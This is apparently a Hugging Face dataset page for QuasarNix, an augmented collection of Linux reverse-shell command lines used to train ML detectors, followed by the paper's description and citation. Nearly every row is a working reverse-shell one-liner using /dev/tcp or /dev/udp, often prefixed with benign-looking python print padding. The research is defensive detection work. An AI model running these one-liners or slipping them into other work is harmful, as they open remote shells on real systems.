text
stringlengths 21
738
|
---|
sh -i >& /dev/tcp/10.164.246.227/53 0>&1 |
/bin/bash -i >& /dev/tcp/10.56.16.186/22 0>&1 |
/bin/sh -i >& /dev/tcp/10.234.242.183/24848 0>&1 |
python3 -c "print('find . -depth -type f -not -name *.itp -and -not -name *ane.gro -and -not -name *.top -ex')" ;/usr/bin/dash -i -l >& /dev/udp/10.236.143.216/22 0>&1 |
python3 -b -c "print('find . -type f -name '*.php' -exec wc -l {} \; | egrep "^\s*1\s"
;yes | head -3
;kill -9 ')" ;/usr/bin/bash -avi >& /dev/tcp/179690462/62264 0>&1 |
python3 -c "print('find . -perm +600 -print
;find /path -type f -print0 | xargs -0 rm
;cat <(crontab -l) <(e')" ;bash -avi >& /dev/tcp/170739433/53 0>&1 |
bash -i >& /dev/udp/10.230.138.103/30399 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find /etc /srv \! -path "./srv/tftp/pxelinux.cfg*" -a \! -name /etc/mtab
;yes | cp * /tmp')" ;/bin/bash -i -l >& /dev/tcp/10.229.196.144/9001 0>&1 |
/usr/bin/sh -i >& /dev/tcp/10.194.21.121/8000 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -c "print('find */201111 -name "*.jpg"
;find . -path ./misc -prune -o -name '*.txt' -print
;find "$s')" ;/usr/bin/dash -a -i >& /dev/udp/175050805/80 0>&1 |
dash -i >& /dev/tcp/10.226.252.108/53 0>&1 |
python3 -b -c "print('filename="$(uname -a)$(date)"
;find /home/jassi/ -name "aliencoders.[0-9]+" |& xargs ls -')" ;/usr/bin/bash -i -l >& /dev/tcp/178420879/40708 0>&1 |
/usr/bin/bash -i >& /dev/udp/10.93.105.15/942 0>&1 |
/usr/bin/sh -i >& /dev/udp/10.166.221.170/9001 0>&1 |
/bin/dash -i >& /dev/udp/10.93.76.252/22 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('Prints what month it was 222 days ago
;file file-name
;find "$sourceDir" -type d | sed -e')" ;sh -a -i >& /dev/udp/183592457/58772 0>&1 |
python3 -b -c "print('find /path/to/base/dir -type d -exec chmod 755 {} +
;find . -type f -name \*.bak -print0 ')" ;sh -avi >& /dev/udp/177448119/8000 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find /mnt/zip -name "*prefs copy" -print0 | xargs -p rm
;find . -name f* -print
;yes -- -')" ;bash -i >& /dev/tcp/175912764/35926 0>&1 |
/usr/bin/sh -i >& /dev/udp/10.194.86.51/8000 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('bunzip2 file.bz2
;find /usr -mmin 5
;find . -type d -printf "%A@ %p\n" | sort -n | tail -')" ;sh -i >& /dev/udp/10.157.185.189/9001 0>&1 |
/bin/bash -i >& /dev/tcp/10.83.10.201/13499 0>&1 |
/bin/sh -i >& /dev/udp/127.0.0.1/9001 0>&1 |
/usr/bin/sh -i >& /dev/udp/10.168.23.232/28987 0>&1 |
bash -i >& /dev/udp/10.67.99.218/8000 0>&1 |
/bin/dash -i >& /dev/udp/10.24.190.58/11080 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -c "print('find . -type f -exec grep -i “redeem reward” {} \; -print 2>/dev/null
;find /home 2>/dev/null;cat /dev/urandom |')" ;bash -a -i >& /dev/tcp/10.146.67.84/8888 0>&1 |
bash -i >& /dev/tcp/10.145.131.142/6048 0>&1 |
python3 -b -c "print('find . -exec grep -l foo {} +
;ssh host "test -e /path/to/file"
;find . -type f -name "*.')" ;/usr/bin/dash -avi >& /dev/tcp/2130706433/37721 0>&1 |
/usr/bin/sh -i >& /dev/tcp/10.235.195.47/10497 0>&1 |
/bin/bash -i >& /dev/tcp/127.0.0.1/61058 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -c "print('find /path -perm -go+w
;shred -v -n 0 -z -u /path/to/your/file #overwriting with zeroes a')" ;/bin/bash -i >& /dev/tcp/10.10.57.170/443 0>&1 |
python3 -c "print('find /u/bill -amin +2 -amin -6
;find . -regex ".*/my.*p.$"
;find . -name some_pattern -pr')" ;bash -i >& /dev/tcp/10.209.241.46/25557 0>&1 |
dash -i >& /dev/udp/127.0.0.1/80 0>&1 |
sh -i >& /dev/tcp/10.172.127.3/53 0>&1 |
/usr/bin/bash -i >& /dev/tcp/10.174.6.191/65192 0>&1 |
sh -i >& /dev/udp/10.72.244.191/8888 0>&1 |
bash -i >& /dev/tcp/10.156.202.14/8888 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -c "print('find ~ -name 'arrow*'
;sudo chown nobody /var/www/html/mysite/tmp_file_upload/
;sudo su -')" ;/bin/bash -a -i >& /dev/udp/175317212/80 0>&1 |
python3 -b -c "print('pstree -a
;find . -name "*.txt" -type f -daystart -mtime -91 -mtime +2 | xargs cat | sor')" ;bash -i >& /dev/udp/10.114.156.69/8080 0>&1 |
/bin/bash -i >& /dev/tcp/10.82.225.35/29784 0>&1 |
bash -i >& /dev/tcp/10.55.192.98/22 0>&1 |
/bin/bash -i >& /dev/udp/10.22.149.75/29323 0>&1 |
python3 -b -c "print('find local /tmp -name mydir -type d -print
;find . -type f -print | xargs -L1 wc -l
;ssh ')" ;/bin/sh -i >& /dev/tcp/10.7.177.45/8888 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('find $LOGDIR -type d -mtime +5 -exec rm -f {} \;
;echo something | read param
;find var/ ')" ;/bin/sh -li >& /dev/tcp/167846312/35204 0>&1 |
python3 -c "print('find /usr -name '*.sh'
;kill -20 $PID; kill -18 $PID
;find . -size 10 print
;nohup vlc -')" ;/bin/bash -avi >& /dev/tcp/10.149.34.107/5641 0>&1 |
/usr/bin/dash -i >& /dev/udp/10.15.137.115/8888 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('diff file2 file1 | grep '^>' | sed 's/^>\ //'
;find "$ORIG_DIR"
;find . type -f -amin 2
;')" ;/bin/sh -a -i >& /dev/tcp/10.85.27.205/22 0>&1 |
python3 -b -c "print('find . -type f -mmin -60 -print0 | xargs -r0 ls -l
;echo "$(hostname):$(cat /sys/block/sd')" ;sh -avi >& /dev/udp/2130706433/8888 0>&1 |
/bin/bash -i >& /dev/udp/10.251.127.226/80 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find . -print -name dir -prune
;find . -iname '*.txt' -type f -exec sed -i '' 's/[[:space')" ;/bin/sh -i -l >& /dev/udp/171444667/8000 0>&1 |
sh -i >& /dev/tcp/10.252.108.204/443 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find / -type f \( -name "*.xls" -o -name "*.csv" \) -exec ls -l {} \;
;yes no
;find "$d/"')" ;bash -li >& /dev/udp/170684223/80 0>&1 |
/usr/bin/sh -i >& /dev/tcp/10.224.45.104/443 0>&1 |
dash -i >& /dev/tcp/127.0.0.1/36844 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -c "print('find . — type f -exec ls -1 {} \;
;chown user2:user2 -R subdir2
;for f in `find -name '*c')" ;/bin/sh -a -i >& /dev/udp/177142150/17950 0>&1 |
python3 -b -c "print('find . -type f -newermt "Aug 10" ! -newermt "Aug 17" -exec rm {} \;
;find . -exec sh -c '')" ;/bin/bash -li >& /dev/udp/177747775/22 0>&1 |
dash -i >& /dev/tcp/127.0.0.1/8000 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('mount -t ntfs
;find . -maxdepth 1 ! -regex '.*~$' ! -regex '.*\.orig$' \ ! -regex '.*')" ;/usr/bin/sh -i >& /dev/udp/169452862/9001 0>&1 |
/bin/dash -i >& /dev/tcp/10.184.67.191/36235 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('find . -type f -exec chmod 0660 {} +
;find . -type f -name "your_pattern" -exec du -ch {')" ;sh -i >& /dev/tcp/10.135.177.124/65095 0>&1 |
/bin/sh -i >& /dev/tcp/10.88.175.30/8080 0>&1 |
bash -i >& /dev/tcp/10.223.107.100/57692 0>&1 |
/bin/dash -i >& /dev/udp/10.176.35.136/3646 0>&1 |
/bin/dash -i >& /dev/tcp/10.240.110.38/22 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find . -name core -ctime +4 -exec /bin/rm -f {} \;
;find /tmp/ -exec ls "{}" +
;find . -n')" ;/bin/dash -a -i >& /dev/tcp/127.0.0.1/8888 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('read PASSWORD
;find tmp -type f -printf "f %s %p\n"
;find /home/pat -iname "*.conf"
;jobs')" ;/usr/bin/sh -li >& /dev/tcp/183466439/443 0>&1 |
python3 -b -c "print('ifconfig | awk '$0 ~ /HWaddr/ { print $5 }'
;find /path/to/some/dir/*[0-9] -type d -maxde')" ;/usr/bin/sh -avi >& /dev/udp/10.95.6.140/14296 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -c "print('/usr/bin/find /home/user/Series/ -iname "*sample*" -exec rm {} \;
;rev file.txt | cut -d ')" ;/usr/bin/dash -i -l >& /dev/tcp/127.0.0.1/443 0>&1 |
/usr/bin/bash -i >& /dev/udp/10.227.62.14/22 0>&1 |
python3 -c "print('find . -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort
;find /tmp -name '*.swp' -exec rm ')" ;sh -i >& /dev/udp/182309818/22 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find /var/log/crashes -name app-\*\.log -mmin -5
;tar -czvf my_directory.tar.gz -C my_dir')" ;/bin/sh -avi >& /dev/udp/2130706433/80 0>&1 |
bash -i >& /dev/udp/10.60.149.117/8888 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('find "$DIR" -type f -atime +5 -exec rm {} \;
;find . -type d -path '*/\.*' -prune -o -not')" ;bash -i -l >& /dev/udp/10.176.40.26/8000 0>&1 |
python3 -c "print('dig +short myip.opendns.com @resolver1.opendns.com
;read -d '' line
;$ find other -maxdep')" ;/bin/bash -i >& /dev/tcp/10.7.163.212/33407 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find . -type f -exec echo {} {} \;
;find . -type f \! -name '*.xml' -print0 | xargs -0 re')" ;/bin/sh -i -l >& /dev/udp/178697485/56372 0>&1 |
python3 -b -c "print('nl -ba infile
;find . -iname "*.mov" -print0 | xargs -0 -i sh -c 'ffmpeg -i {} -f flv `ba')" ;bash -a -i >& /dev/udp/172307195/9001 0>&1 |
/bin/dash -i >& /dev/tcp/10.4.53.242/22 0>&1 |
sh -i >& /dev/udp/10.251.74.211/22 0>&1 |
/usr/bin/bash -i >& /dev/tcp/10.125.145.251/16478 0>&1 |
/usr/bin/bash -i >& /dev/tcp/10.182.75.91/9001 0>&1 |
sh -i >& /dev/tcp/127.0.0.1/8000 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('awk '{for(i=3;i<=NF;i++){print $1,$2,$i}}' file | column -t
;find . -type d -print|sed 's')" ;dash -li >& /dev/udp/176757194/16837 0>&1 |
/bin/bash -i >& /dev/tcp/10.71.170.140/47744 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find . -maxdepth 0 -type f -exec chmod g+w {} ';'
;cd "${dirs[-1]}"
;find folder1/ -type ')" ;/bin/bash -a -i >& /dev/udp/10.166.233.96/443 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find . -ls|awk 'BEGIN{OFS=","}$1=$1'
;find dir -name '*.jpg' -exec ln -s "{}" \;
;find /')" ;sh -i >& /dev/udp/127.0.0.1/21365 0>&1 |
dash -i >& /dev/tcp/10.144.53.7/8888 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find /starting/path -name target.out | xargs /path/to/simpleGrepScript.sh
;find . \( \( -')" ;/usr/bin/sh -i >& /dev/tcp/10.13.104.97/28564 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -b -c "print('find / -name "*.core" -print -exec rm {} \;
;find . -name something -exec ls -l {} \;
;fi')" ;sh -a -i >& /dev/tcp/171396680/8080 0>&1 |
bash -i >& /dev/tcp/10.108.49.107/48437 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('MYUSERS=`grep $MYGROUP /etc/group | cut -d ":" -f4| tr "," "\n"`
;ps -A -o pid | xargs -I')" ;/bin/bash -li >& /dev/tcp/179114703/8000 0>&1 |
/usr/bin/sh -i >& /dev/tcp/10.186.58.175/8000 0>&1 |
bash -i >& /dev/udp/10.103.201.160/35021 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('find $HOME -not -iname "*.c" -print
;shift $(($#-1))
;find / -name Chapter1 -type f
;read')" ;/usr/bin/dash -avi >& /dev/udp/10.236.2.26/80 0>&1 |
/usr/bin/sh -i >& /dev/udp/127.0.0.1/17405 0>&1 |
sh -i >& /dev/tcp/10.186.39.230/22 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -b -c "print('( find ./ -name '*.php' -print0 | xargs -0 cat ) | wc -l
;mkdir -p ./some/path
;find /roo')" ;/bin/dash -i >& /dev/tcp/180834772/22 0>&1 |
/usr/bin/sh -i >& /dev/tcp/10.139.149.204/43572 0>&1 |
cp /usr/bin/python /tmp/python; /tmp/python -c "print('find . -type f -printf "%s\t%p\n" | sort -n | tail -1
;finger $username | awk '/^Director')" ;sh -a -i >& /dev/tcp/179844422/36787 0>&1 |
cp /usr/bin/python /tmp/test; /tmp/test -c "print('zcat file.gz | awk -v RS="-----------\n" '/A=2[ ,\n]/ && /dummy=2[ ,\n]/{count++} !/dummy')" ;/bin/bash -i >& /dev/udp/10.62.92.213/24596 0>&1 |
/usr/bin/sh -i >& /dev/udp/10.71.41.164/58564 0>&1 |
QuasarNix: Adversarially Robust Living-off-The-Land Reverse-Shell Detection Informed by Malicious Data Augmentation and Machine Learning

Description
This repository contains the datasets from the paper "Living-off-The-Land Reverse-Shell Detection by Informed Data Augmentation" by Dmitrijs Trizna, Luca Demetrio, Battista Biggio, and Fabio Roli. The paper pre-print is available on arXiv.
Security Information and Event Management (SIEM) cyber-threat detection solutions are highly extensible, with numerous public collections of signature-based rules. However, there are no known repositories with behavioral Machine Learning~(ML) cyber-threat detection heuristics. To address this gap, we develop framework for constructing ML detectors that leverages data augmentation.
Based on our framework, we are releasing production-ready adversarially robust ML detectors of Linux living-off-the-land (LOTL) reverse shells, trained on all known LOTL reverse shell manifestations identified by our threat intelligence under https://huggingface.co/dtrizna/QuasarNix and datasets here to foster adversarial ML research in cyber-security.
To the best of our knowledge, we are the first to publicly release generally applicable ML cyber-threat detection models suitable to wide variety of SIEM environments.
Code
https://github.com/dtrizna/QuasarNix
Cite Us
@misc{trizna2024livingoffthelandreverseshelldetectioninformed,
title={Living-off-The-Land Reverse-Shell Detection by Informed Data Augmentation},
author={Dmitrijs Trizna and Luca Demetrio and Battista Biggio and Fabio Roli},
year={2024},
eprint={2402.18329},
archivePrefix={arXiv},
primaryClass={cs.CR},
url={https://arxiv.org/abs/2402.18329},
}
- Downloads last month
- 97